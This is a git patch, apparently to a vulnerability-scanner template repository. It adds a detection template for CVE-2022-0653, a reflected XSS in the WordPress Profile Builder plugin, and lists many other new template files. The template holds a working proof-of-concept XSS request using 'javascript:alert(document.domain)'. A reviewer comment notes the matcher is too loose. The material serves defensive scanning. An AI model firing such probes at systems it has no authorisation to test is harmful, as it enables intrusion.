From 1f9c5311ab50c259d0f41cdf21e08e5a77533856 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 24 Feb 2022 17:03:20 +0530
Subject: [PATCH] =?UTF-8?q?CVE-2022-0653=20Wordpress=20Profile=20Builder?= =?UTF-8?q?=20=E2=80=93=20User=20Profile=20&=20User=20Registration=20Forms?= =?UTF-8?q?=20(#3761)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* Auto Generated New Template Addition List [Wed Feb 23 16:10:39 UTC 2022] :robot:
* Create CVE-2022-0653.yaml
* Auto Generated New Template Addition List [Wed Feb 23 16:13:51 UTC 2022] :robot:
* misc updates
* Auto Generated New Template Addition List [Thu Feb 24 11:29:05 UTC 2022] :robot:
Co-authored-by: GitHub Action
Co-authored-by: sandeep
---
.new-additions | 145 +++++++++++++++++++++++++++++++++++
cves/2022/CVE-2022-0653.yaml | 30 ++++++++
2 files changed, 175 insertions(+)
create mode 100644 cves/2022/CVE-2022-0653.yaml
diff --git a/.new-additions b/.new-additions
index ebc716a391..6cbe4c4924 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,24 +1,169 @@ +cves/2009/CVE-2009-5020.yaml +cves/2012/CVE-2012-4547.yaml +cves/2013/CVE-2013-7091.yaml +cves/2016/CVE-2016-10940.yaml +cves/2016/CVE-2016-3978.yaml +cves/2018/CVE-2018-1000226.yaml +cves/2018/CVE-2018-18925.yaml +cves/2018/CVE-2018-7602.yaml cves/2019/CVE-2019-1010290.yaml +cves/2019/CVE-2019-10758.yaml +cves/2019/CVE-2019-13396.yaml +cves/2019/CVE-2019-3911.yaml +cves/2019/CVE-2019-3912.yaml +cves/2020/CVE-2020-12447.yaml +cves/2020/CVE-2020-18268.yaml +cves/2020/CVE-2020-24391.yaml +cves/2020/CVE-2020-25864.yaml +cves/2020/CVE-2020-35749.yaml +cves/2020/CVE-2020-36365.yaml +cves/2021/CVE-2021-20150.yaml +cves/2021/CVE-2021-20158.yaml +cves/2021/CVE-2021-20792.yaml +cves/2021/CVE-2021-21973.yaml +cves/2021/CVE-2021-24300.yaml +cves/2021/CVE-2021-24488.yaml +cves/2021/CVE-2021-24510.yaml +cves/2021/CVE-2021-24750.yaml +cves/2021/CVE-2021-24838.yaml +cves/2021/CVE-2021-24926.yaml +cves/2021/CVE-2021-24947.yaml +cves/2021/CVE-2021-24991.yaml +cves/2021/CVE-2021-25008.yaml +cves/2021/CVE-2021-25028.yaml +cves/2021/CVE-2021-25052.yaml cves/2021/CVE-2021-25063.yaml +cves/2021/CVE-2021-25074.yaml +cves/2021/CVE-2021-25864.yaml +cves/2021/CVE-2021-26247.yaml +cves/2021/CVE-2021-32682.yaml +cves/2021/CVE-2021-32853.yaml cves/2021/CVE-2021-3293.yaml +cves/2021/CVE-2021-34640.yaml +cves/2021/CVE-2021-34643.yaml +cves/2021/CVE-2021-39322.yaml +cves/2021/CVE-2021-39350.yaml +cves/2021/CVE-2021-39433.yaml +cves/2021/CVE-2021-40323.yaml cves/2021/CVE-2021-43062.yaml +cves/2021/CVE-2021-43810.yaml +cves/2021/CVE-2021-45380.yaml +cves/2021/CVE-2021-46005.yaml cves/2022/CVE-2022-0149.yaml +cves/2022/CVE-2022-0218.yaml +cves/2022/CVE-2022-0281.yaml +cves/2022/CVE-2022-0378.yaml +cves/2022/CVE-2022-0432.yaml +cves/2022/CVE-2022-0653.yaml +cves/2022/CVE-2022-23178.yaml +cves/2022/CVE-2022-23808.yaml +cves/2022/CVE-2022-23944.yaml cves/2022/CVE-2022-24112.yaml cves/2022/CVE-2022-25323.yaml +default-logins/cobbler/cobbler-default-login.yaml 
+default-logins/gophish/gophish-default-login.yaml +default-logins/huawei/huawei-HG532e-default-router-login.yaml +default-logins/jboss/jmx-default-login.yaml +default-logins/mofi/mofi4500-default-login.yaml +default-logins/netsus/netsus-default-login.yaml +default-logins/versa/versa-default-login.yaml +default-logins/xerox/xerox7-default-login.yaml +exposed-panels/alfresco-detect.yaml +exposed-panels/atvise-login.yaml +exposed-panels/bigbluebutton-login.yaml +exposed-panels/cisco/cisco-ucs-kvm-login.yaml +exposed-panels/cobbler-webgui.yaml +exposed-panels/code42-panel.yaml +exposed-panels/concrete5/concrete5-install.yaml +exposed-panels/concrete5/concrete5-panel.yaml +exposed-panels/ecosys-command-center.yaml +exposed-panels/flightpath-panel.yaml +exposed-panels/gophish-login.yaml +exposed-panels/hashicorp-consul-agent.yaml +exposed-panels/hashicorp-consul-webgui.yaml +exposed-panels/jamf-panel.yaml +exposed-panels/netdata-dashboard-detected.yaml +exposed-panels/netsus-server-login.yaml +exposed-panels/openbmcs-detect.yaml exposed-panels/otobo-panel.yaml +exposed-panels/projectsend-login.yaml exposed-panels/pypicloud-panel.yaml +exposed-panels/qualcomm-voip-router.yaml +exposed-panels/seeddms-panel.yaml +exposed-panels/strapi-documentation.yaml +exposed-panels/submitty-login.yaml +exposed-panels/teltonika-login.yaml +exposed-panels/terraform-enterprise-panel.yaml +exposed-panels/threatq-login.yaml +exposed-panels/trendnet/trendnet-tew827dru-login.yaml +exposed-panels/typo3-login.yaml exposed-panels/unauth-xproxy-dashboard.yaml +exposed-panels/versa-sdwan.yaml +exposed-panels/voipmonitor-panel.yaml +exposed-panels/wallix-accessmanager-panel.yaml +exposed-panels/wazuh-panel.yaml +exposed-panels/webmodule-ee-panel.yaml +exposed-panels/xxljob-panel.yaml +exposed-panels/zblogphp-panel.yaml +misconfiguration/caddy-open-redirect.yaml +misconfiguration/cobbler-exposed-directory.yaml +misconfiguration/misconfigured-concrete5.yaml 
+misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml +misconfiguration/openbmcs/openbmcs-ssrf.yaml +ssl/deprecated-tls.yaml +takeovers/gitbook-takeover.yaml takeovers/short-io.yaml +technologies/airtame-device-detect.yaml +technologies/apollo-server-detect.yaml +technologies/appcms-detect.yaml +technologies/cobbler-version.yaml +technologies/erxes-detect.yaml +technologies/gnuboard-detect.yaml +technologies/interactsh-server.yaml +technologies/lexmark-detect.yaml +technologies/metatag-cms.yaml +technologies/projectsend-detect.yaml technologies/roundcube-webmail-portal.yaml +technologies/smartstore-detect.yaml +technologies/typo3-detect.yaml technologies/web-suite-detect.yaml technologies/zerof-webserver-detect.yaml +vulnerabilities/gitlab/gitlab-rce.yaml +vulnerabilities/jamf/jamf-blind-xxe.yaml +vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +vulnerabilities/joomla/rusty-joomla.yaml +vulnerabilities/laravel/laravel-ignition-xss.yaml +vulnerabilities/other/antsword-backdoor.yaml vulnerabilities/other/goip-1-lfi.yaml +vulnerabilities/other/java-melody-xss.yaml +vulnerabilities/other/kyocera-m2035dn-lfi.yaml vulnerabilities/other/otobo-open-redirect.yaml vulnerabilities/other/pollbot-redirect.yaml +vulnerabilities/other/yishaadmin-lfi.yaml +vulnerabilities/ransomware/deadbolt-ransomware.yaml vulnerabilities/wordpress/accessibility-helper-xss.yaml +vulnerabilities/wordpress/candidate-application-lfi.yaml +vulnerabilities/wordpress/cherry-lfi.yaml +vulnerabilities/wordpress/churchope-lfi.yaml +vulnerabilities/wordpress/db-backup-lfi.yaml vulnerabilities/wordpress/easy-social-feed.yaml +vulnerabilities/wordpress/elementorpage-open-redirect.yaml vulnerabilities/wordpress/elex-woocommerce-xss.yaml vulnerabilities/wordpress/feedwordpress-xss.yaml +vulnerabilities/wordpress/hb-audio-lfi.yaml +vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml vulnerabilities/wordpress/mthemeunus-lfi.yaml +vulnerabilities/wordpress/music-store-open-redirect.yaml 
vulnerabilities/wordpress/my-chatbot-xss.yaml +vulnerabilities/wordpress/newsletter-open-redirect.yaml +vulnerabilities/wordpress/ninjaform-open-redirect.yaml +vulnerabilities/wordpress/noptin-open-redirect.yaml +vulnerabilities/wordpress/shortcode-lfi.yaml +vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml +vulnerabilities/wordpress/sniplets-lfi.yaml +vulnerabilities/wordpress/sniplets-xss.yaml +vulnerabilities/wordpress/wp-code-snippets-xss.yaml +vulnerabilities/wordpress/wp-spot-premium-lfi.yaml vulnerabilities/wordpress/wp-whmcs-xss.yaml +workflows/concrete-workflow.yaml +workflows/gophish-workflow.yaml
diff --git a/cves/2022/CVE-2022-0653.yaml b/cves/2022/CVE-2022-0653.yaml
new file mode 100644
index 0000000000..114ac988f7
--- /dev/null
+++ b/cves/2022/CVE-2022-0653.yaml
@@ -0,0 +1,30 @@
+id: CVE-2022-0653
+
+info:
+ name: Wordpress Profile Builder Plugin XSS
+ author: dhiyaneshDk
+ severity: medium
+ reference:
+ - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
+ tags: cve,cve2022,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'here'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
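Review bot: The body matcher in the new template keys on the single word `here`, so any response that is 200, `text/html` and contains that word (a soft-404 or catch-all page, for instance) is reported as CVE-2022-0653 even though nothing from the request was reflected. The matcher should require the supplied `site_url` value to appear in the body, for example by adding `- 'javascript:alert(document.domain);'` under `words` and setting `condition: and` on that matcher. Matching the value inside the link markup would be stricter still, but the plugin's output is not visible in this diff, so the exact string should be confirmed against a vulnerable and a patched install. The `info` block also carries no `description`, which leaves a finding with only the reference link to tell triage which component and versions are affected.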